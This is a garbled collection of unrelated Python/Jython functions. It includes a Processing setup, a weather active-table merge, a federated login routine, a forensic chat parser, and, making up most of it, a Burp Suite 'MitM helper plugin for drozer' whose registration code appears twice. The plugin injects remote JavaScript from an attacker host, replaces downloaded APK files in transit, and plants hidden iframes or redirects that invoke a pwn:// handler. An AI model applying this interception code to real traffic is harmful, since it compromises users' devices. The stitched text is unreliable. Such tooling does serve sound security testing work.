    an empty history list and a random two-component noise offset."""
    start = PVector(width/2, height/2)
    self.position = start
    self.velocity = PVector()
    self.acceleration = PVector()
    self.history = ArrayList()
    # two independent draws from random(1000), in this order
    noiseX = random(1000)
    noiseY = random(1000)
    self.noff = PVector(noiseX, noiseY)
def makeNullResponse(self):
    """Return a new, empty ArrayList."""
    return ArrayList()
def mergeFromJava(siteId, activeTable, newRecords, logger, mode, offsetSecs=0):
    """Merge new records into the active table and return a MergeResult.

    Wraps the Java records as ActiveTableRecord objects, runs
    ActiveTable.activeTableMerge, logs the outcome grouped by state, and
    converts the updated, purged and changed entries back to Java lists.
    Durations of the pre- and post-processing phases go to perfStat.
    """
    perfStat.log(
        "mergeFromJava called for site: %s, activeTable: %d , newRecords: %d" %
        (siteId, activeTable.size(), newRecords.size()))
    timer = TimeUtil.getTimer()
    timer.start()

    # existing records are tagged "Previous"; new ones take the default state
    activeCount = activeTable.size()
    pyActive = [
        ActiveTableRecord.ActiveTableRecord(activeTable.get(idx), "Previous")
        for idx in range(activeCount)
    ]
    newCount = newRecords.size()
    pyNew = [
        ActiveTableRecord.ActiveTableRecord(newRecords.get(idx))
        for idx in range(newCount)
    ]

    active = ActiveTable(mode, logger)
    logger.info("Updating " + mode + " Active Table: new records\n" +
                active.printActiveTable(pyNew, combine=1))

    timer.stop()
    perfStat.logDuration("mergeFromJava preprocess", timer.getElapsedTime())

    merged = active.activeTableMerge(pyActive, pyNew, offsetSecs)
    updatedTable, purgeRecords, changes, changedFlag = merged
    perfStat.log(
        "mergeFromJava activeTableMerge returned updateTable: %d, purgeRecords: %d, changes: %d" %
        (len(updatedTable), len(purgeRecords), len(changes)))

    timer.reset()
    timer.start()
    logger.info("Updated " + mode + " Active Table: purged\n" +
                active.printActiveTable(purgeRecords, combine=1))

    # group the updated records by state for logging
    byState = {}
    for record in updatedTable:
        state = record['state']
        byState.setdefault(state, []).append(record)

    for state in sorted(byState):
        if state != "Previous":
            logger.info("Updated " + mode + " Active Table: " + state + "\n" +
                        active.printActiveTable(byState[state], combine=1))

    # records still in state "Previous" or "Replaced" are not returned
    updatedList = ArrayList(len(updatedTable))
    for record in updatedTable:
        if record['state'] in ["Previous", "Replaced"]:
            continue
        updatedList.add(record.javaRecord())

    purgedList = ArrayList(len(purgeRecords))
    for record in purgeRecords:
        purgedList.add(record.javaRecord())

    changeList = ArrayList(len(changes))
    if changedFlag:
        from com.raytheon.uf.common.activetable import VTECChange
        for change in changes:
            changeList.add(VTECChange(change[0], change[1], change[2], change[3]))

    from com.raytheon.uf.common.activetable import MergeResult
    result = MergeResult(updatedList, purgedList, changeList)
    timer.stop()
    perfStat.logDuration("mergeFromJava postprocess", timer.getElapsedTime())
    return result
def attemptAuthentication(self, identity, user_profile, user_profile_json):
    """Authenticate the user described by an external provider's profile.

    Looks the user up by external uid and by e-mail, decides whether to
    update an existing entry, add a new one, or deny access, then calls the
    authentication service and records the outcome in the session
    attributes (including the switch-flow and MFA-flow markers).

    Returns False when required attributes are missing, the provider is not
    registered, the MFA user does not match, provisioning raises, or no
    username results. Returns True without authenticating when an e-mail is
    required but unknown (the profile JSON is parked in the session first).
    Otherwise returns the result of AuthenticationService.authenticate.

    NOTE(review): the nesting below is reconstructed from a listing that
    lost its indentation; confirm it against the original script, in
    particular the final if/elif chain.
    """
    uidKey = "uid"
    if not self.checkRequiredAttributes(user_profile, [uidKey, self.providerKey]):
        return False
    provider = user_profile[self.providerKey]
    # only providers registered with this script are accepted
    if not provider in self.registeredProviders:
        print "Passport-social. attemptAuthentication. Identity Provider %s not recognized" % provider
        return False
    #else:
    # TODO - HANDLE ISSUER NOT SET
    # self.registeredProviders[provider]["samlissuer"] == None
    uid = user_profile[uidKey][0]
    # the external uid is namespaced by provider
    externalUid = "passport-%s:%s" % (provider, uid)
    # PERSISTENT_ID - generate the persistentId for the RP if coming from SAML (entityId parameter is set)
    sessionId = identity.getSessionId()
    sessionAttributes = sessionId.getSessionAttributes()
    newPersistentIdSamlRp = sessionAttributes.get("spNameQualifier")
    switchFlowStatus = sessionAttributes.get("switchFlowStatus")
    mfaFlowStatus = sessionAttributes.get("mfaFlowStatus")
    # SWITCH - do NOT generate a new persistentId if the switch flow is being executed
    if ( newPersistentIdSamlRp != None and StringHelper.isNotEmptyString(newPersistentIdSamlRp)
            and switchFlowStatus == None and mfaFlowStatus != "MFA_2_IN_PROGRESS"):
        # PERSISTENT_ID - generate the persistentId for the RP in case there is no further processing/collection happening
        newPersistentIdIdp = self.registeredProviders[provider]["samlissuer"]
        newPersistentIdUid = "sic" + uuid.uuid4().hex
        user_profile["persistentId"][0] = '%s|%s|%s' % (newPersistentIdSamlRp, newPersistentIdIdp, newPersistentIdUid )
    else:
        # NOTE(review): pop() without a default raises KeyError when the
        # profile has no "persistentId" entry (if user_profile is a plain
        # dict), and that happens outside the try block further down
        user_profile.pop("persistentId")
    # NOTE(review): indexing "claims" likewise raises KeyError when the
    # entry is absent
    if ( user_profile["claims"] != None ):
        # DISTRIBUTED CLAIMS - save the access token and the userInfo URL
        claimsReturn = user_profile["claims"]
        # NOTE(review): per the comment above this value carries an access
        # token, and printing it writes that token to the script log;
        # consider logging only that claims were present
        print "Passport-social. attemptAuthentication. Claims '%s'" % claimsReturn
    print "Passport-social. attemptAuthentication. Looking for user with oxExternalUid = '%s'" % externalUid
    userService = CdiUtil.bean(UserService)
    userByUid = userService.getUserByAttribute("oxExternalUid", externalUid)
    # MFA - if MFA is in progress, make sure UID matches the previous one
    # NOTE(review): a profile from provider "mfa" outside an in-progress MFA
    # flow is not rejected here and continues like any other provider;
    # confirm that is intended
    if ( provider == "mfa" and sessionAttributes.get("mfaFlowStatus") == "MFA_2_IN_PROGRESS" ):
        # get the MFA PAI from the external UID
        if ( userByUid == None ):
            # the MFA authenticated user is not the same user
            print "Passport-social. attemptAuthentication. ERROR for MFA - MFA user cannot be found"
            return False
        elif ( userByUid.getUserId() != sessionAttributes.get("authenticatedUser") ):
            # the MFA authenticated user is not the same user
            print "Passport-social. attemptAuthentication. ERROR for MFA - The original and MFA users do not match"
            return False
    # normalise "mail" to a single value, or None when the list is empty
    email = None
    if "mail" in user_profile:
        email = user_profile["mail"]
        if len(email) == 0:
            email = None
        else:
            email = email[0]
            user_profile["mail"] = [ email ]
    if email == None and self.registeredProviders[provider]["requestForEmail"]:
        print "Passport-social. attemptAuthentication. Email was not received"
        if userByUid != None:
            # This avoids asking for the email over every login attempt
            email = userByUid.getAttribute("mail")
            if email != None:
                print "Passport-social. attemptAuthentication. Filling missing email value with %s" % email
                user_profile["mail"] = [ email ]
        if email == None:
            # Store user profile in session and abort this routine
            identity.setWorkingParameter("passport_user_profile", user_profile_json)
            return True
    userByMail = None if email == None else userService.getUserByAttribute("mail", email)
    # Determine if we should add entry, update existing, or deny access
    doUpdate = False
    doAdd = False
    if userByUid != None:
        print "User with externalUid '%s' already exists" % externalUid
        if userByMail == None:
            doUpdate = True
        else:
            if userByMail.getUserId() == userByUid.getUserId():
                doUpdate = True
            else:
                # both flags stay False, so the request is rejected below
                print "Users with externalUid '%s' and mail '%s' are different. Access will be denied. Impersonation attempt?" % (externalUid, email)
                self.setMessageError(FacesMessage.SEVERITY_ERROR, "Email value corresponds to an already existing provisioned account")
    else:
        if userByMail == None:
            doAdd = True
        elif self.registeredProviders[provider]["emailLinkingSafe"]:
            # NOTE(review): linking relies on the e-mail asserted by the
            # external provider; presumably emailLinkingSafe should only be
            # enabled for providers that verify e-mail ownership - confirm
            tmpList = userByMail.getAttributeValues("oxExternalUid")
            tmpList = ArrayList() if tmpList == None else ArrayList(tmpList)
            tmpList.add(externalUid)
            userByMail.setAttribute("oxExternalUid", tmpList)
            userByUid = userByMail
            print "External user supplying mail %s will be linked to existing account '%s'" % (email, userByMail.getUserId())
            doUpdate = True
        else:
            # both flags stay False, so the request is rejected below
            print "An attempt to supply an email of an existing user was made. Turn on 'emailLinkingSafe' if you want to enable linking"
            self.setMessageError(FacesMessage.SEVERITY_ERROR, "Email value corresponds to an already existing account. If you already have a username and password use those instead of an external authentication site to get access.")
    # MFA - if MFA is REQUIRED generate the MFA PAI for the second pass
    if ( provider != "mfa" and sessionAttributes.get("mfaFlowStatus") == "MFA_1_REQUIRED" ):
        # generate a new MFA PAI in case there is none in the user profile
        user_profile[ "oxExternalUid_newMfa" ] = [ "passport-mfa:" + "mfa" + uuid.uuid4().hex ]
    username = None
    try:
        if doUpdate:
            username = userByUid.getUserId()
            print "Passport-social. attemptAuthentication. Updating user %s" % username
            self.updateUser(userByUid, user_profile, userService)
        elif doAdd:
            print "Passport-social. attemptAuthentication. Creating user %s" % externalUid
            # the new local uid is random, not the provider's uid
            user_profile[uidKey][0] = uuid.uuid4().hex
            newUser = self.addUser(externalUid, user_profile, userService)
            username = newUser.getUserId()
    except:
        # fails closed; the bare except also catches non-Exception errors
        print "Exception: ", sys.exc_info()[1]
        print "Passport-social. attemptAuthentication. Authentication failed"
        return False
    if username == None:
        print "Passport-social. attemptAuthentication. Authentication attempt was rejected"
        return False
    else:
        logged_in = CdiUtil.bean(AuthenticationService).authenticate(username)
        print "Passport-social. attemptAuthentication. Authentication for %s returned %s" % (username, logged_in)
        if ( logged_in == True ):
            # Save the authenticated data
            sessionAttributes.put("authenticatedProvider", "passport_social:" + provider)
            sessionAttributes.put("authenticatedUser", username)
            # SWITCH - Save contextual data for the switch flows
            if (switchFlowStatus == "1_GET_SOURCE"):
                print "Passport-social. attemptAuthentication. SWITCH FLOW: Setting SOURCE provider to %s" % sessionAttributes.get("authenticatedProvider")
                sessionAttributes.put( "switchSourceAuthenticatedProvider", sessionAttributes.get("authenticatedProvider") )
                sessionAttributes.put( "switchSourceAuthenticatedUser", username)
            elif (switchFlowStatus == "2_GET_TARGET"):
                print "Passport-social. attemptAuthentication. SWITCH FLOW: Setting TARGET provider to %s" % sessionAttributes.get("authenticatedProvider")
                sessionAttributes.put("switchTargetAuthenticatedProvider", sessionAttributes.get("authenticatedProvider") )
                sessionAttributes.put("switchTargetAuthenticatedUser", username)
            elif (mfaFlowStatus == "MFA_1_REQUIRED"):
                print "Passport-social. attemptAuthentication. MFA FLOW: starting flow marking status = MFA_2_IN_PROGRESS"
                sessionAttributes.put("mfaFlowStatus", "MFA_2_IN_PROGRESS" )
                identity.setWorkingParameter("selectedProvider", "mfa")
            elif ( mfaFlowStatus == "MFA_2_IN_PROGRESS" ):
                print "Passport-social. attemptAuthentication. MFA FLOW: Marking flow as complete"
                sessionAttributes.put("mfaFlowStatus", "MFA_3_COMPLETE" )
        # NOTE(review): placed as the failure branch of the logged_in check;
        # if it belonged to the chain above it would be unreachable, because
        # the same condition is tested just before it
        elif ( mfaFlowStatus == "MFA_2_IN_PROGRESS" ):
            print "Passport-social. attemptAuthentication. MFA FLOW: Marking flow as FAILED"
            sessionAttributes.put("mfaFlowStatus", "MFA_3_FAILED" )
        ## SESSION_SAFE - update
        CdiUtil.bean(SessionIdService).updateSessionId(sessionId)
        return logged_in
def registerExtenderCallbacks(self, callbacks):
    """Burp entry point: keep the API handles, build the extension tab, start listening.

    Creates four Tool rows (each given a request executor and a response
    executor), lays them out next to a log table, then registers this object
    with Burp as a suite tab and as an HTTP listener.
    """
    self._callbacks = callbacks
    self._helpers = callbacks.getHelpers()
    callbacks.setExtensionName("MitM helper plugin for drozer")

    # Log rows backing the table, plus the lock taken while appending to them.
    self._log = ArrayList()
    self._lock = Lock()

    self._splitpane = swing.JSplitPane(swing.JSplitPane.HORIZONTAL_SPLIT)
    toolsPanel = swing.JPanel()
    toolsPanel.setLayout(swing.BoxLayout(toolsPanel, swing.BoxLayout.Y_AXIS))

    # Positional constructor arguments, one tuple per Tool. The list order is
    # kept exactly as before because the tools are later addressed by index.
    toolArguments = (
        (180, "JavaScript Injection",
         "Inject Remote JS into HTTP Responses",
         self.nothing, self.injectJs,
         "JS Location", "http://x.x.x.x:31415/dz.js"),
        (180, "APK Replacement",
         "Replace APK with specified one when requested",
         self.modifyAPKRequest, self.injectAPK,
         "APK Location", "", True),
        (170, "Invoke drozer using pwn://",
         "Inject code into HTTP Responses that invokes installed drozer agent",
         self.nothing, self.injectPwn,
         None, None, None,
         "Perform active invocation (required for Chromium >= 25)"),
        (220, "Custom URI Handler Injection",
         "Inject code into HTTP Responses that invokes specified URI handler",
         self.nothing, self.injectCustomURI,
         "URI", "pwn://me", None,
         "Perform active invocation (required for Chromium >= 25)"),
    )
    self.tools = []
    for arguments in toolArguments:
        self.tools.append(Tool(*arguments))

    for tool in self.tools:
        toolsPanel.add(tool.getPanel())
    self._splitpane.setLeftComponent(toolsPanel)

    # Log table on the right-hand side of the split pane.
    logView = Table(self)
    logView.setAutoResizeMode(swing.JTable.AUTO_RESIZE_ALL_COLUMNS)
    logView.getColumn("Time").setPreferredWidth(120)
    logView.getColumn("URL").setPreferredWidth(500)
    logScroller = swing.JScrollPane(logView)
    self._splitpane.setRightComponent(logScroller)

    # Let Burp apply its look and feel to every component we created.
    for component in (self._splitpane, logView, logScroller, toolsPanel):
        callbacks.customizeUiComponent(component)

    callbacks.addSuiteTab(self)
    callbacks.registerHttpListener(self)
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel):
    """Burp extension that rewrites proxied HTTP messages and logs each rewrite.

    registerExtenderCallbacks creates four Tool rows; every row carries a
    request executor and a response executor taken from this class, and
    processHttpMessage calls them for each message while the row is enabled.
    The executors only act on messages Burp hands to its HTTP listeners, so
    transport security on the client and signature checks on downloaded
    packages are the controls that decide whether a rewrite has any effect.
    The class is also the table model for the log shown in the tab.
    """

    #
    # Evil global variables
    # Be ready to receive hate mail Tyrone & Daniel!
    #
    # Class-level dict, so it is shared by every instance. Keyed by request
    # path only (no host); filled by modifyAPKRequest, read by injectAPK.
    apkRequests = {}

    #
    # Executors
    #
    def injectPwn(self, messageInfo):
        """Response executor: insert a pwn:// invocation before </body>.

        The tick box of tools[2] selects between a hidden iframe and a
        window.location redirect. The response is replaced, and a log row
        added, only when the substitution changed the body.
        """
        # Get response
        response = messageInfo.getResponse()
        responseParsed = self._helpers.analyzeResponse(response)
        # Everything after the headers, as a string.
        body = self._callbacks.getHelpers().bytesToString(
            response)[responseParsed.getBodyOffset():]
        headers = responseParsed.getHeaders()
        if not self.tools[2].getTickBoxTicked():
            # Method 1 - silent invocation - Inject iframe loading from pwn:// into responses (case insensitive)
            changedContent = re.sub(
                re.compile(r'</body>', re.IGNORECASE),
                '<iframe src="pwn://lol" width=1 height=1 style="visibility:hidden;position:absolute"></iframe></body>',
                body)
        else:
            # Method 2 - active invocation - redirect to the pwn:// handler (this is a requirement for versions of Chromium >= 25)
            changedContent = re.sub(
                re.compile(r'</body>', re.IGNORECASE),
                '<script>window.location="pwn://www.google.com/pluginerror.html"</script></body>',
                body)
        changedContentBytes = self._callbacks.getHelpers().stringToBytes(
            changedContent)
        final = self._callbacks.getHelpers().buildHttpMessage(
            headers, changedContentBytes)
        # Set the response if the content changed and add to log
        if body != changedContent:
            messageInfo.setResponse(final)
            self.addLog(
                self._helpers.analyzeRequest(messageInfo).getUrl(),
                "Injected drozer invocation with pwn://")
        return

    def injectJs(self, messageInfo):
        """Response executor: add a <script src=...> tag at three anchor points.

        The script location is the edit-box text of tools[0], concatenated
        into the markup as-is. Anchors are <head>, </body> and <content>,
        matched case-insensitively.
        """
        # Get response
        response = messageInfo.getResponse()
        responseParsed = self._helpers.analyzeResponse(response)
        body = self._callbacks.getHelpers().bytesToString(
            response)[responseParsed.getBodyOffset():]
        headers = responseParsed.getHeaders()
        editBoxStr = str(self.tools[0].getEditBox())
        # Inject arbitrary script into responses
        changedContent = re.sub(
            re.compile(r'<head>', re.IGNORECASE),
            '<head><script src="' + editBoxStr + '"></script>', body)
        changedContent = re.sub(
            re.compile(r'</body>', re.IGNORECASE),
            '<script src="' + editBoxStr + '"></script></body>',
            changedContent)
        changedContent = re.sub(
            re.compile(r'<content>', re.IGNORECASE),
            '<content><script src="' + editBoxStr + '"></script>',
            changedContent)
        changedContentBytes = self._callbacks.getHelpers().stringToBytes(
            changedContent)
        final = self._callbacks.getHelpers().buildHttpMessage(
            headers, changedContentBytes)
        # Set the response if the content changed and add to log
        if body != changedContent:
            messageInfo.setResponse(final)
            self.addLog(
                self._helpers.analyzeRequest(messageInfo).getUrl(),
                "Injected JavaScript from " + editBoxStr)
        return

    def modifyAPKRequest(self, messageInfo):
        """Request executor: for paths ending in .apk, record the real response headers.

        Sends its own HEAD request to the original host, stores the URL,
        status line and headers in apkRequests under the request path, then
        points the proxied request at a different host.
        """
        # Get requested path
        req = self._callbacks.getHelpers().analyzeRequest(messageInfo)
        reqUrl = req.getUrl()
        headers = list(req.getHeaders())  # convert to python list
        reqHost = reqUrl.getHost()
        reqPath = reqUrl.getPath()
        reqPort = reqUrl.getPort()
        # If it ends in .apk then change type to HEAD
        if reqPath.upper().endswith(".APK"):
            self.addLog(reqUrl, "Got request for APK...")
            # Determine whether an HTTP or HTTPS connection must be made
            # (decided by port number alone: 443 means HTTPS)
            if reqPort == 443:
                conn = http.client.HTTPSConnection(reqHost, reqPort)
            else:
                conn = http.client.HTTPConnection(reqHost, reqPort)
            # Get headers from user request; entries that do not split into
            # exactly two parts on ": " (the request line, for one) are dropped
            httpLibHeaders = {}
            for i in headers:
                splitHeaders = i.split(": ")
                if len(splitHeaders) == 2:
                    httpLibHeaders[splitHeaders[0]] = splitHeaders[1]
            # Perform HEAD on target file from server using headers
            conn.request("HEAD", reqPath, headers=httpLibHeaders)
            response = conn.getresponse()
            responseHeaders = response.getheaders()
            # Add to information for use by injectAPK()
            version = ""
            if str(response.version) == "11":
                version = "HTTP/1.1"
            else:
                version = "HTTP/1.0"
            self.apkRequests[reqPath] = [
                reqUrl,
                version + " " + str(response.status) + " " +
                str(response.reason), responseHeaders
            ]
            print(self.apkRequests[reqPath])
            # Instead of passing request - change host to www.google.com which will be non existent
            httpService = messageInfo.getHttpService()
            messageInfo.setHttpService(
                self._callbacks.getHelpers().buildHttpService(
                    "www.google.com", httpService.getPort(),
                    httpService.getProtocol()))
        return

    def injectAPK(self, messageInfo):
        """Response executor: answer a recorded .apk request with a local file.

        Acts only when the path ends in .apk and modifyAPKRequest stored an
        entry for it. The stored status line and headers are reused unchanged,
        which is why a client that checks the package signature or digest is
        not satisfied by matching headers alone.
        """
        # Get requested path
        req = self._callbacks.getHelpers().analyzeRequest(messageInfo)
        reqUrl = req.getUrl()
        reqHost = reqUrl.getHost()
        reqPath = reqUrl.getPath()
        reqPort = reqUrl.getPort()
        # If it ends in .apk then replace it!
        if reqPath.upper().endswith(".APK"):
            # Check this is a request we have seen
            if reqPath in self.apkRequests:
                # Get stored url and header
                res = self.apkRequests[reqPath]
                url = res[0]
                httpStatus = res[1]
                headers = []
                headers.append(httpStatus)
                for i in res[2]:
                    headers.append(i[0] + ': ' + ''.join(i[1:]))
                # Open and read APK from specified path
                f = open(self.tools[1].getEditBox())
                changedContentBytes = f.read()
                f.close()
                final = self._callbacks.getHelpers().buildHttpMessage(
                    headers, changedContentBytes)
                # Replace response with new APK
                messageInfo.setResponse(final)
                self.addLog(url, "Replaced APK!")
        return

    def injectCustomURI(self, messageInfo):
        """Response executor: like injectPwn, but with the URI from tools[3]'s edit box.

        The URI text is concatenated into the inserted markup as-is.
        """
        # Get response
        response = messageInfo.getResponse()
        responseParsed = self._helpers.analyzeResponse(response)
        body = self._callbacks.getHelpers().bytesToString(
            response)[responseParsed.getBodyOffset():]
        headers = responseParsed.getHeaders()
        uri = self.tools[3].getEditBox()
        if not self.tools[3].getTickBoxTicked():
            # Method 1 - silent invocation - Inject iframe loading from pwn:// into responses (case insensitive)
            changedContent = re.sub(
                re.compile(r'</body>', re.IGNORECASE),
                '<iframe src="' + uri +
                '" width=1 height=1 style="visibility:hidden;position:absolute"></iframe></body>',
                body)
        else:
            # Method 2 - active invocation - redirect to the pwn:// handler (this is a requirement for versions of Chromium >= 25)
            changedContent = re.sub(
                re.compile(r'</body>', re.IGNORECASE),
                '<script>window.location="' + uri + '"</script></body>',
                body)
        changedContentBytes = self._callbacks.getHelpers().stringToBytes(
            changedContent)
        final = self._callbacks.getHelpers().buildHttpMessage(
            headers, changedContentBytes)
        # Set the response if the content changed and add to log
        if body != changedContent:
            messageInfo.setResponse(final)
            self.addLog(
                self._helpers.analyzeRequest(messageInfo).getUrl(),
                "Injected custom URI")
        return

    def nothing(self, messageInfo):
        """No-op executor for tools that act on only one message direction."""
        pass

    #
    # implement IBurpExtender
    #
    def registerExtenderCallbacks(self, callbacks):
        """Store the Burp API handles, build the tab UI and register as tab and HTTP listener."""
        # Make available to whole class
        self._callbacks = callbacks
        # obtain an extension helpers object
        self._helpers = callbacks.getHelpers()
        # set our extension name
        callbacks.setExtensionName("MitM helper plugin for drozer")
        # create the log and a lock on which to synchronize when adding log entries
        self._log = ArrayList()
        self._lock = Lock()
        # Split pane
        self._splitpane = swing.JSplitPane(swing.JSplitPane.HORIZONTAL_SPLIT)
        # Create Tab
        topPanel = swing.JPanel()
        topPanel.setLayout(swing.BoxLayout(topPanel, swing.BoxLayout.Y_AXIS))
        # Define all tools; the executors address these by list index
        # (0 = JS, 1 = APK, 2 = pwn://, 3 = custom URI), so order matters
        self.tools = []
        self.tools.append(
            Tool(180, "JavaScript Injection",
                 "Inject Remote JS into HTTP Responses", self.nothing,
                 self.injectJs, "JS Location", "http://x.x.x.x:31415/dz.js"))
        self.tools.append(
            Tool(180, "APK Replacement",
                 "Replace APK with specified one when requested",
                 self.modifyAPKRequest, self.injectAPK, "APK Location", "",
                 True))
        self.tools.append(
            Tool(
                170, "Invoke drozer using pwn://",
                "Inject code into HTTP Responses that invokes installed drozer agent",
                self.nothing, self.injectPwn, None, None, None,
                "Perform active invocation (required for Chromium >= 25)"))
        self.tools.append(
            Tool(
                220, "Custom URI Handler Injection",
                "Inject code into HTTP Responses that invokes specified URI handler",
                self.nothing, self.injectCustomURI, "URI", "pwn://me", None,
                "Perform active invocation (required for Chromium >= 25)"))
        # Add all tools to panel
        for i in self.tools:
            topPanel.add(i.getPanel())
        self._splitpane.setLeftComponent(topPanel)
        # table of log entries
        logTable = Table(self)
        logTable.setAutoResizeMode(swing.JTable.AUTO_RESIZE_ALL_COLUMNS)
        logTable.getColumn("Time").setPreferredWidth(120)
        logTable.getColumn("URL").setPreferredWidth(500)
        scrollPane = swing.JScrollPane(logTable)
        self._splitpane.setRightComponent(scrollPane)
        # customize our UI components
        callbacks.customizeUiComponent(self._splitpane)
        callbacks.customizeUiComponent(logTable)
        callbacks.customizeUiComponent(scrollPane)
        callbacks.customizeUiComponent(topPanel)
        # add the custom tab to Burp's UI
        callbacks.addSuiteTab(self)
        # register ourselves as an HTTP listener
        callbacks.registerHttpListener(self)
        return

    def addLog(self, url, action):
        """Append a (UTC timestamp, url, action) row to the log and notify the table."""
        # NOTE(review): there is no try/finally here, so an exception between
        # acquire() and release() would leave the lock held.
        self._lock.acquire()
        row = self._log.size()
        self._log.add(
            LogEntry(strftime("%Y-%m-%d %H:%M:%S", gmtime()), url, action))
        self.fireTableRowsInserted(row, row)
        self._lock.release()

    #
    # implement ITab
    #
    def getTabCaption(self):
        """Return the caption of the extension's tab."""
        return "drozer"

    def getUiComponent(self):
        """Return the split pane built in registerExtenderCallbacks."""
        return self._splitpane

    #
    # implement IHttpListener
    #
    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        """Run the request or response executor of every enabled tool on the message.

        toolFlag is not consulted, so messages from every Burp tool that
        reaches this listener are processed.
        """
        # Execute all enabled tools
        for i in self.tools:
            if i.getButtonEnabled():
                if messageIsRequest:
                    i.getRequestExecutor()(messageInfo)
                else:
                    i.getResponseExecutor()(messageInfo)

    #
    # extend AbstractTableModel
    #
    def getRowCount(self):
        """Return the number of log rows, or 0 if the log cannot be read yet."""
        try:
            return self._log.size()
        except:
            return 0

    def getColumnCount(self):
        """Return the fixed column count (Time, URL, Action)."""
        return 3

    def getColumnName(self, columnIndex):
        """Return the header for columnIndex, or "" for an unknown index."""
        if columnIndex == 0:
            return "Time"
        if columnIndex == 1:
            return "URL"
        if columnIndex == 2:
            return "Action"
        return ""

    def getValueAt(self, rowIndex, columnIndex):
        """Return the cell value of the log row, or "" for an unknown column."""
        logEntry = self._log.get(rowIndex)
        if columnIndex == 0:
            return logEntry._time
        if columnIndex == 1:
            return logEntry._url
        if columnIndex == 2:
            return logEntry._action
        return ""
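def __findWWFMessagesInDB(self, databasePath, abstractFile, dataSource):
    """Create one TSK_MESSAGE artifact per row of the Words With Friends chat_messages table.

    Opens the SQLite file at databasePath over JDBC, reads every chat message,
    attaches the message attributes to a new artifact on abstractFile, links the
    sender's account to the device account and posts the artifact to the
    blackboard. Returns None in every case.

    Changes over the previous version: the JDBC handles are now released on
    every exit path (an exception while creating the device account used to
    leave statement and connection open, and a failing resultSet.close() used
    to skip the other two), and a database that cannot be opened or queried is
    logged instead of being skipped silently, so an examiner can see that the
    file was not parsed.

    wwfAccountType is not defined in this method; it is expected to be
    available from the enclosing scope.
    """
    if not databasePath:
        return

    def closeQuietly(resource):
        # Best-effort close of one JDBC handle; a failure here must not
        # prevent the remaining handles from being closed.
        if resource is None:
            return
        try:
            resource.close()
        except Exception as ex:
            # Error closing database.
            pass

    bbartifacts = list()
    connection = None
    statement = None
    try:
        Class.forName("org.sqlite.JDBC")  # load JDBC driver
        connection = DriverManager.getConnection("jdbc:sqlite:" + databasePath)
        statement = connection.createStatement()
    except (ClassNotFoundException) as ex:
        self._logger.log(Level.SEVERE, "Error loading JDBC driver", ex)
        self._logger.log(Level.SEVERE, traceback.format_exc())
        return
    except (SQLException) as ex:
        # Error opening database.
        self._logger.log(
            Level.WARNING,
            "Unable to open Words With Friends database " + str(databasePath),
            ex)
        closeQuietly(connection)
        return

    resultSet = None
    try:
        # Create a 'Device' account using the data source device id.
        # Exceptions raised here still propagate to the caller, as before;
        # the outer finally only makes sure the handles are closed first.
        datasourceObjId = dataSource.getDataSource().getId()
        ds = Case.getCurrentCase().getSleuthkitCase().getDataSource(
            datasourceObjId)
        deviceID = ds.getDeviceId()
        deviceAccountInstance = Case.getCurrentCase().getSleuthkitCase(
        ).getCommunicationsManager().createAccountFileInstance(
            Account.Type.DEVICE, deviceID, general.MODULE_NAME, abstractFile)

        # One random prefix per database; combined with user_id to form the thread id.
        uuid = UUID.randomUUID().toString()

        try:
            resultSet = statement.executeQuery(
                "SELECT message, strftime('%s' ,created_at) as datetime, user_id, game_id FROM chat_messages ORDER BY game_id DESC, created_at DESC;"
            )
            while resultSet.next():
                message = resultSet.getString("message")  # WWF message text
                created_at = resultSet.getLong("datetime")
                user_id = resultSet.getString("user_id")  # ID of the user who sent the message
                game_id = resultSet.getString("game_id")  # ID of the game in which the message was sent
                thread_id = "{0}-{1}".format(uuid, user_id)

                # Create a message artifact and add attributes from the result set.
                attributes = ArrayList()
                artifact = abstractFile.newArtifact(
                    BlackboardArtifact.ARTIFACT_TYPE.TSK_MESSAGE)
                attributes.add(
                    BlackboardAttribute(
                        BlackboardAttribute.ATTRIBUTE_TYPE.TSK_DATETIME,
                        general.MODULE_NAME, created_at))
                attributes.add(
                    BlackboardAttribute(
                        BlackboardAttribute.ATTRIBUTE_TYPE.TSK_NAME,
                        general.MODULE_NAME, user_id))
                attributes.add(
                    BlackboardAttribute(
                        BlackboardAttribute.ATTRIBUTE_TYPE.TSK_MSG_ID,
                        general.MODULE_NAME, game_id))
                attributes.add(
                    BlackboardAttribute(
                        BlackboardAttribute.ATTRIBUTE_TYPE.TSK_TEXT,
                        general.MODULE_NAME, message))
                attributes.add(
                    BlackboardAttribute(
                        BlackboardAttribute.ATTRIBUTE_TYPE.TSK_MESSAGE_TYPE,
                        general.MODULE_NAME, "Words With Friends Message"))
                attributes.add(
                    BlackboardAttribute(
                        BlackboardAttribute.ATTRIBUTE_TYPE.TSK_THREAD_ID,
                        general.MODULE_NAME, thread_id))
                artifact.addAttributes(attributes)

                # Create an account for the sender
                wwfAccountInstance = Case.getCurrentCase().getSleuthkitCase(
                ).getCommunicationsManager().createAccountFileInstance(
                    wwfAccountType, user_id, general.MODULE_NAME, abstractFile)

                # create relationship between accounts
                Case.getCurrentCase().getSleuthkitCase(
                ).getCommunicationsManager().addRelationships(
                    deviceAccountInstance, [wwfAccountInstance], artifact,
                    Relationship.Type.MESSAGE, created_at)

                bbartifacts.append(artifact)

                try:
                    # index the artifact for keyword search
                    blackboard = Case.getCurrentCase().getSleuthkitCase(
                    ).getBlackboard()
                    blackboard.postArtifact(artifact, general.MODULE_NAME)
                except Blackboard.BlackboardException as ex:
                    self._logger.log(
                        Level.SEVERE,
                        "Unable to index blackboard artifact " +
                        str(artifact.getArtifactID()), ex)
                    self._logger.log(Level.SEVERE, traceback.format_exc())
                    MessageNotifyUtil.Notify.error(
                        "Failed to index WWF message artifact for keyword search.",
                        artifact.getDisplayName())
        except SQLException as ex:
            # Unable to execute WWF messages SQL query against database.
            self._logger.log(
                Level.WARNING,
                "Unable to query Words With Friends messages in " +
                str(databasePath), ex)
        except Exception as ex:
            self._logger.log(
                Level.SEVERE,
                "Error parsing messages from Words With Friends.", ex)
            self._logger.log(Level.SEVERE, traceback.format_exc())
    finally:
        # Close each handle on its own so one failure cannot leak the others.
        closeQuietly(resultSet)
        closeQuietly(statement)
        closeQuietly(connection)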
def registerExtenderCallbacks(self, callbacks):
    """Burp entry point for InjectionScanner: set up state, build the tab, register hooks.

    Stores the callback and helper objects, initialises the log, locks and
    probe lists, lays out the data table, log table, request/response viewers
    and control buttons, then registers this object as a suite tab, a context
    menu factory and an HTTP listener.
    """
